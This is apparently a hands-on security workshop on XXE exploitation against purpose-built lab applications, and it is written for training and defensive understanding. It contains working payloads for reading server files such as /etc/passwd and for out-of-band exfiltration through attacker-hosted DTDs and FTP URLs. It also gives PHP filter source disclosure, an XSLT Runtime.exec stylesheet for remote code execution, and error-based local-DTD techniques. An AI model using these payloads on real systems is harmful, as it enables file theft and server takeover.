Welcome to this 3-hour workshop on XML External Entities (XXE) exploitation!

In this workshop, the latest XML eXternal Entities (XXE) and XML related attack vectors will be presented. XXE is a vulnerability that affects any XML parser that evaluates external entities. It is gaining more visibility with its introduction to the OWASP Top10 2017 (A4). You might be able to detect the classic patterns, but can you convert the vulnerability into directory file listing, binary file exfiltration, file write or remote code execution?

The focus of this workshop will be presenting various techniques and exploitation tricks for both PHP and Java applications. Four applications will be at your disposition to test your skills. For every exercise, sample payloads will be given so that the attendees save some time.

Agenda:

Requirements

The first requirement is to have a to have an HTTP interception proxy installed.

For the infrastructure, you will need:

Deploying Test Applications

In order to do the exercise, you will need to run the lab applications by yourself. All applications were built with a docker container recipe. This should make the deployment easier.

  1. Download the code.
    $ git clone https://github.com/GoSecure/xxe-workshop
  2. Read build instructions (%application_dir%/README.md) This step will differ for each application.
  3. Use docker-compose to start the application.
    $ docker-compose up

XML is everywhere

XML format examples

XML documents are used in plenty of file formats. You have probably already edited a configuration file written in XML. If you have built a website, you will edit or see inevitably HTML. You can also think about MS Office documents (.docx), Scalable Vector Graphic (.svg) and SOAP requests. Being widely implemented in most programming language, it is an excellent choice for interoperability. The XML standard describes many useful formatting features but we are going to focus on "entities" because of the potential vulnerability it introduces.

What are XML entities?

XML entities are reference to XML data inside of XML documents. We are mentioning XML data because it can be a literal string, XML tags or any legal XML syntax where it is inserted.

Entity in HTML are used for special characters

Entity in HTML

Entity is being used for a repeated pattern

Entity use for repeated pattern

SYSTEM or External entities

Malicious XXE payload

When the keyword SYSTEM is added to an entity, it will attempt to load content from the specified URL. The value between quote is the URL. For XML parsing done in a small script execute locally, this seems like a nice feature. However, when the parsing is done server side, the URLs from SYSTEM entities are also resolved on the server. A malicious user could point to a file hosted on the remote server. If the server return the parsing result, it will suddenly reveal the content of this file.

<!DOCTYPE data [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>

If the application return the value inside the data node, the content of the file /etc/passwd will be reveal.

Interesting files to read

passwd is a file that is universally present on Linux operating system.

Hostnames, DNS resolvers and network devices information can give precious information to discover additional assets.

The /proc virtual filesystem include various files describing the current process.

There are few files that are containing the system version. These are also files with no special characters (Useful for testing).

For testing purpose, it might be interesting to read virtual file with infinite content. The objective of the attacker would be to either do time based detection or create some sort of Denial of Service (DOS).

For this first exercise, we are using a website that render Atom feed. The service is at the URL : http://xxe-workshop.gosec.co:8021

Preview website

Solution

By submitting the form with the news feed (Atom feed) from the sub-reddit netsec.

Preview website

At this point, we can assume that the server is parsing this XML source because we are only seeing one HTTP request in our proxy. The URL could have been fetched from the browser in JavaScript but it is not the case here.

Serving your XML Files

For the workshop, you can use your shell to serve HTTP requests. As you can see below, you can start your simple web server with the command : python -m http.server 8123.

Preview website

Sending a basic payload

It is always best to start with a simple working XML file rather than submit first a complex and specific payload. Sometime failure to load our XML can be caused by simple syntax issue. XML can be unforgiving regarding the order of XML syntax, mistyped elements and unsupported characters.

Preview website

Once the file is saved, you can submit a URL to this file. The URL must be public.

Preview website

The result page should look like the following. It is a confirmation that our base file is valid. An XML file with a format other than Atom will trigger an error.

Preview website

Confirming that XML Entities are enabled

Next, we will attempt to fetch a file on the file system with an XML Entities. The Atom should look as follows.

Preview website

As a result, we can see the content of the file /etc/passwd in the response.

Preview website

In the source, we can see more easily the content of the file with new lines.

Preview website

Out-of-band Exfiltration

XML parsing remotely will not always return content directly. If you are uploading a document such as a data file (.xml) or a MS Office document (.docx), you might not receive the content parse from those documents.

We need to find a way exfiltrate data during the parsing. Unfortunately, it is not possible refer to an entity from another entity in the same DOCTYPE. This limitation comes from the way XML parsers interpret the document.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [ 
 <!ENTITY file SYSTEM "file:///etc/passwd">
 <!ENTITY notworking SYSTEM "http://xxe.me/&file;">
]>
<data></data>

This payload will not work

A workaround for this limitation was discovered by researchers Alexey Osipov and Timur Yunusov that allow the construction of URL with data coming from other entities. The first version of this payload uses the Gopher protocol.

XXE Gopher exfiltration

The previous technique was updated with a variant. This variant replaces Gopher with the FTP protocol. It is very useful because the Gopher is deprecated and only available on old version of Java.

The following payload requires a remote DTD file to be hosted on a web server. The DTD file is taking care of doing the concatenation. The final objective is to evaluate ftp://test:%file;@my.ftp.server/. The file content is sent as a password.

payload sent

<?xml version="1.0"?>
<!DOCTYPE data [ 
 <!ENTITY % file SYSTEM "file:///etc/passwd">
 <!ENTITY % dtd SYSTEM "http://your.host/remote.dtd"> 
%dtd;]>
<data>&send;</data>

http://your.host/remote.dtd

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'ftp://test:%file;@my.ftp.server/'>"> %all;

In order to capture the file content, you need to record the password sent to your FTP server. To serve this purpose, Ivan Novikov has created a mock FTP server that respond just enough to record a password. (FTP clients will not authenticate if the handshake is incomplete.)

For this second exercise, we are using a website that render SVG image based on the XML given. The service is at the URL : http://xxe-workshop.gosec.co:8022

Preview website

Solution

First exploration

When reusing the technique we saw in the previous exercise, we can see that the file content is displaying all in one line. This makes it hard to exfiltrate text files. In many real-world cases, the result will simply not be displayed to the user. The parsing will be hidden and possibly done asynchronously.

Simple XXE test in SVG parser

Out-of-bound with the FTP protocol

Now, we are going to attempt to exfiltrate the file with the out-of-bound DTD technique. The XML payload will look as follows:

XML payload XXE out-of-bound

The DTD reference in the XML payload is a file that is hosted on a server that we control. The DTD serve the purpose of concatenating the file content to the FTP URL.

XXE DTD with FTP URL

Instead of using a real FTP server. We will use a dummy one that responds to few FTP command and will display all content received including the password. We are expecting to receive the file content in the password. shell-workshop.gosec.co is the host from which you are running the mock FTP server. If are running everything locally, you can use localhost.

XXE Dummy FTP

As you can see, the mock FTP service is covering only three FTP commands. You can get the ruby script on the workshop repository.

Sending the XML payload

The payload should look like this.

XXE Request URL escaped in Burp

One easier way to use the encoding tags from the HackVertor plugin. It is a good encoding tool for quickly testing payload without re-encoding the payload on every request.

XXE Request with Burp HackVertor

Payload execution

Every step of the XML parsing is susceptible to fail due to a small error. If you get result different than the screenshot investigate the potential causes.

First, the DTD is fetched. This confirms that our XML payload is well-formed. If it is not the case, verify the URL you specified in the XML entity.

XXE HTTP Request Received

Second, the FTP is contacted. Confirming that the concatenation succeeds.

XXE FTP Request Received

Exploring the file system

You can continue exploring the file system by modifying your XML payload and seeing the result on your shell in the dummy FTP server output.

XXE Exploring file system

Introduction

We already mentioned the php:// protocol. This protocol available - of course - only on PHP is providing few options to encode or decode file content.

XXE have major limitations regarding which file can be read. In general, you can't read non-ASCII characters or special characters that are not XML compatible. You might have noticed when doing the first two exercises.

Encoding file content

In order to read file with special characters, we can take advantage of the php protocol.

php://filter/convert.base64-encode/resource=/source_code.zip

Reference: php:// - php.net documentation

With this new capability, it opens the door to read most configuration files, database files and more.

Other interesting protocols

Here is an exhaustive list of protocols that could be useful when exploiting XXE.

file: protocol

Access file with relative or absolute path

Examples:

http: protocol

Nothing surprising here. You can trigger GET request to HTTP service. While it can be a starting point for Server Side Request Forgery (SSRF), the response is not likely to be readable. Most webpages are not perfectly XML valid.

Example:

:negative https://169.254.169.254/latest/user-data AWS metadata URLs now require a special header. It is unlikely that you will be able to access it with XXE.

ftp: protocol

This protocol allows you to connect to a FTP server to read file (would require to know the exact file location and credentials to authenticate) or exfiltrate data (see the next exercise).

Example:

gopher: protocol

Another option for data exfiltration is the gopher protocol. It allows to connect to any server with a TCP with an arbitrary message. The path section of the URL is the data that will be written to the TCP socket. It is rarely available as it requires very old versions of Java.

jar: protocol

The jar protocol is a very special case. It is only available on Java applications. It allows to access files inside a PKZIP archive (.zip, .jar, ...). You will see in the last exercise how it can be used to write files to a remote server.

Example:

netdoc: protocol

This protocol is alternative to the file:// protocol. It is of limited use. It is often cited as a method to bypass some WAF blocking for specific string such as file:///etc/passwd.

Example:

For this third exercise, we are using a website that is very similar to the first exercise. It is also parsing Atom feed. It is, however, using a different language : PHP. The service is at the URL : http://xxe-workshop.gosec.co:8022

Preview website

Solution

Using a PHP filter

Similarly to the first exercise, we are going to host a malicious Atom feed on a web server. This XML document will use PHP base64-encoding filter inside an XML entity.

We are targeting the file /.svn/wc.db a metadata file containing SVN history information. Hopefully, we can obtain additional information on the codebase.

XXE PHP filter payload

The response will be in Base64 because, this is what we instruct the server to do with the filter. To read the original content, we can decode it with a variety of decoding tools. In Burp, you can press Ctrl-B to decode your selection.

XXE Decoding the Base64 response in Burp

For the .svn/wc.db file extracted, we can see filenames are exposed including some pages we did not know exist!

Hidden page

The SVN metadata file revealed us that a PHP script was present at /test_dev.php.

Hidden page found

We can use the same filter technique to view the source code of this page. Here is the payload.

Viewing PHP source

When the response is received, we can decode the base 64 blob to view the PHP source.

Decoding the Base64 response in Burp

jar: purpose

The jar protocol is only available on Java applications. It allows to access files inside a PKZIP file (.zip, .jar, ...).

It works for local file..

jar:file:///var/myarchive.zip!/file.txt

And with remote file..

jar:https://download.host.com/myarchive.zip!/file.txt

Behind the scenes

What is happening behind the scenes with the HTTP URL with a remote ZIP? There are in fact multiple steps that lead to the file being extracted.

  1. It makes an HTTP request to load the zip archive. https://download.host.com/myarchive.zip
  2. It saves the HTTP response to a temporary location. /tmp/...
  3. It extracts of the archive.
  4. It reads the file.zip
  5. It delete temporary files.

What if we manage to stop the sequence at the second step?.. It is possible to do so! The trick is to never close the connection when serving the file on step 2. The client - in this case the web application - will download as much as it can and write the content as it gets. To accomplish this, we need a modified or custom web server that will hang on purpose. You can find two utilities that will serve this purpose on the Github repository (one in python slow_http_server.py and one in slowserver.jar).

Once the server has downloadeded your file, you need to find its location by browsing the temp directory. Being random, the file path can't be predict in advance.

Jar

Writing files in a temporary directory can help escalate another vulnerability that involves a path traversal (such as local file include, template injection, XSLT RCE, deserialization, etc).

Complement: XSLT RCE

Extensible Stylesheet Language Transformations (or XSLT) is a text format that describes the transformation applied to XML documents. The official specification provides basic transformation. Languages such as Java and .NET have introduced extension to allow the invocation of method from the stylesheet. The Java implementation is more prone to vulnerability being enabled by default. It has the capability to access all class in the classpath.

If you are seeing a feature that allows you to configure an XSLT file in a Java application, remote code execution might be possible.

<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:date="http://xml.apache.org/xalan/java/java.util.Date"
xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime"
xmlns:str="http://xml.apache.org/xalan/java/java.lang.String"
exclude-result-prefixes="date">
    <xsl:output method="text"/>
    <xsl:template match="/">
    <xsl:variable name="cmd"><![CDATA[touch /tmp/test1234]]></xsl:variable>
    <xsl:variable name="rtObj" select="rt:getRuntime()"/>
    <xsl:variable name="process" select="rt:exec($rtObj, $cmd)"/>
    <xsl:text>Process: </xsl:text><xsl:value-of select="$process"/>
    </xsl:template>
</xsl:stylesheet>

In the root node, classes (java.lang.Runtime and java/java.lang.String) are imported for future reference. To customize the previous payload, you need to edit the assignment . The touch command can be replaced with any command available on the server.

Preview website

Solution

Generating a script

To exploit this service, we will need to evaluate multiple URLs with the same XXE base payload. To send those similar requests, we can encapsulate the logic inside a script.

Here is a demonstration of the Burp plugin Reissue Request Scripter. The request exported is the POST request to /admin/upload.

Generating script in Burp

Generated script in Burp

Configuring the exploit script

For this exercise, an exploit script is provided to you. The only segment to edit is the session cookie.

Editing generated script

You can test that the script is working properly by evaluating a test file. The script has only one argument the file to evaluate (python exploit.py [FILE]). In the capture below, we are executing python exploit.py /etc/issue.

Launching XXE script

Exploiting with the jar protocol

In order to persist a file more than a second, we must serve the file with a web server that will hold connection as long as possible. A simple Tornado server is provided in the workshop repository. You can see in the script that a call to the sleep function is done to prevent the connection to close when the function return. As soon as the connection would close, the Java application would attempt to extract the ZIP and dispose the file leaving us no time to use the file written to disk.

Slow HTTP server script

The file that will be served is malicious stylesheet. For more information, refer to the previous section.

In the following stylesheet, we are invoking the methods Runtime.getRuntime().exec("/bin/busybox ....").

XSLT payload

Putting the pieces together

Step 1: Starting the "slow" HTTP server

Slow HTTP server

Step 2: Uploading our file

Slow HTTP server

Step 3: Browsing to find the full path of the file

Slow HTTP server

Step 4: Exploit path traversal

Path traversal Burp

Step 5: Interact with shell

NC Shell

The problem

If the XML parsed is not returned and the network out-of-bound channel is not possible (aggressive network filter), would the XML parser be vulnerable in this case? This case was for a few years consider unexploitable.

Error-based exfiltration

Filename exception

One of the remaining channels is the error messages. This channel is available if the application is configured to returned detail error messages.

Method without external DTD

Can we do a concatenation trick without external DTD ? The short answer to the problem is: Yes we can! Arseniy Sharoglazov found an interesting technique that allows us to use a local DTD instead of an external DTD.

We need to find an entity that is declared and use in the same DTD. Here is an example taken from /usr/share/xml/fontconfig/fonts.dtd.

[...]
<!ENTITY % constant '>[MALICIOUS]<!ELEMENT dummy(123 '>
<!ELEMENT patelt (%constant;)*>
[...]

If we replace the constant entity by the following XML injection. It would allow us to evaluate arbitrary XML. Our objective is going to do a concatenation within this injection point.

<!ENTITY % constant '>[MALICIOUS]<!ELEMENT dummy(123 '>

<!ELEMENT patelt (%constant;)*>

The malicious XML we are looking to inject in the [MALICIOUS] placeholder is the following:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">

When %eval will be evaluated, the concatenation will occur.

Overview

In summary, here are the steps that will be needed during the XML parsing:

  1. Initialize local DTD
  2. Overrides one of its entities (replace the entity)
  3. Evaluate ELEMENT and ENTITY from the local DTD

The final evaluation should trigger the injection of new entities doing the same concatenation trick used in external DTD.

Final payload

The payload we are going to send will look like this:

<!DOCTYPE message [
    <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd">

<!ENTITY % constant '><!ENTITY &#x25; file SYSTEM
"file:///etc/passwd"> <!ENTITY &#x25; eval "<!ENTITY
&#x26;#x25; error SYSTEM
&#x27;file:///nonexistent/&#x25;file;&#x27;>"><!ELEMENT
dummy(123 '>
<!ELEMENT patelt (%constant;)*>


    %local_dtd;
]>
<message></message>

To see it in action, pass to the next section.

If you want to know more about the different injection patterns, visit this blog post: Automating local DTD discovery for XXE exploitation.

Preview website

Solution

Triggering a FileNotFoundException

At first, we need to build a base payload that simply trigger a FileNotFoundException. We need to confirm that error message are returned to the client.

Burp request file not found

Using Intruder to Brute Force DTD

In order to find if at least one interesting DTD is present on the remote server, we are going to need to brute force it with a huge list of potential paths.

Request to intruder

The content that will change in our request is the path. The XML around this path will not change and it needs to be URL encoded.

Request to intruder prefix suffix

Filtering attempt

Once Intruder is done with the brute force attack, we can filter result with a negative search.

Intruder filter

Intruder is not showing the initial value from our list, but the final value encoded. For this reason, we need to decode the path from the request.

Intruder result decoding url

Using the DTD found

Once a DTD with a known overridable entity is found, we can start to poke at files to exfiltrate.

You can reuse a XXE payload from this list. Only the file entity needs to be changed. The path to the DTD (local_dtd) and the dummy path (/nonexistant) will be unmodified.

File content received

You can view the complete attack in this video.

Misconfigured XML parser can open doors to attackers. Being able to read files on the vulnerable server is the main concern. But as you saw in this workshop, being able to read key files can lead to escalating to remote command execution.

From a developer perspective, you can prevent such issue by configuring properly the XML parser in used in your application. Few libraries have secure configuration by default but it is best to verify with a reference such as the OWASP Cheat Sheet in the reference below.

References